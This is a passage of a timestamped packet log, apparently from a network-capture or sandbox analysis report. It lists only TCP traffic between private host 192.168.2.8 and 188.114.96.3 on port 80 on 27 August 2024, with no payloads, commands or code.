                                Aug 27, 2024 09:49:41.341114044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341125011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341135025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341136932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.341145039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341156960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341161966 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.341167927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341178894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341182947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.341188908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341206074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.341227055 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.341254950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341269970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341288090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341305971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341317892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341320992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.341331005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341341972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.341348886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.341363907 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.343724012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.425802946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.425816059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.425826073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.425846100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.425858021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.425868034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.425893068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.425934076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.425952911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.425964117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.425975084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.425986052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.425996065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426004887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426007986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426021099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426054955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426069021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426090002 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426131010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426297903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426309109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426318884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426347971 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426373959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426384926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426394939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426414013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426420927 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426445007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426455975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426466942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426490068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426501036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426501989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426512003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426529884 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426554918 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426624060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426635027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426645041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426656008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426666975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426670074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426678896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426687956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426723957 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426825047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426836014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426848888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426866055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426867962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426878929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426891088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426903009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426911116 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426913977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426925898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426928997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426937103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426949024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426954031 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426960945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.426979065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426990032 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.426996946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427397013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427407980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427418947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427432060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427443981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427447081 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427454948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427464962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427470922 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427484989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427493095 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427498102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427508116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427510023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427527905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427530050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427539110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427550077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427561998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427561998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427572966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427584887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427598000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427598953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427611113 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427613974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427624941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427635908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427644968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427648067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427656889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427668095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427670002 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427678108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427686930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427690029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427704096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427710056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427715063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427731037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427767992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427767992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427778006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427788019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427798033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427803040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427836895 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.427966118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427975893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427985907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.427998066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428008080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428014040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.428019047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428030014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428031921 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.428040981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428050995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428061008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428064108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.428072929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428085089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428096056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.428132057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.428253889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428275108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428284883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428293943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428303957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428314924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428318977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.428324938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428333998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428342104 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.428344965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428354979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428356886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.428364992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428375006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428381920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.428386927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428399086 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.428431988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.428510904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428520918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.428551912 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.468241930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.468255997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.468272924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.468293905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.468305111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.468312025 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.468316078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.468327045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.468338966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.468343019 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.468369961 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.507991076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.512623072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512643099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512649059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512660980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512671947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512676001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512682915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512720108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.512758017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.512782097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512792110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512801886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512814045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512824059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512825966 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.512841940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512845993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.512852907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.512871027 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.512886047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513128042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513180971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513190985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513226032 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513236046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513246059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513257980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513267994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513278961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513290882 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513312101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513315916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513318062 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513325930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513365030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513418913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513430119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513442039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513453007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513462067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513463974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513483047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513525009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513536930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513547897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513559103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513569117 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513570070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513586044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513634920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513689995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513700962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513710976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513721943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513734102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513740063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513741970 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513753891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513760090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513770103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513782024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513792038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513818026 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513851881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513863087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513873100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513884068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.513905048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513931990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.513994932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514003992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514008999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514014006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514023066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514034033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514049053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514055014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514060974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514071941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514081001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514097929 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514122009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514147997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514271021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514280081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514292002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514301062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514313936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514314890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514323950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514333963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514341116 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514350891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514358997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514362097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514370918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514373064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514398098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514534950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514544010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514553070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514564991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514578104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514581919 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514590025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514600992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514611959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514612913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514622927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514631033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514633894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514645100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514646053 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514657021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514664888 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514667988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514683962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514710903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514728069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514738083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514748096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514760017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514770985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514796019 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514862061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514872074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514883041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514893055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514904022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514911890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.514920950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514955997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.514969110 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.515006065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515016079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515026093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515037060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515048027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515048981 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.515064001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515074968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.515075922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515085936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515096903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515110016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515113115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.515120983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515130997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515136957 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.515141964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515152931 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.515256882 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.515325069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515336037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515341997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515347004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515357971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515369892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.515371084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.515379906 CEST8049715188.114.96.3192.168.2.8
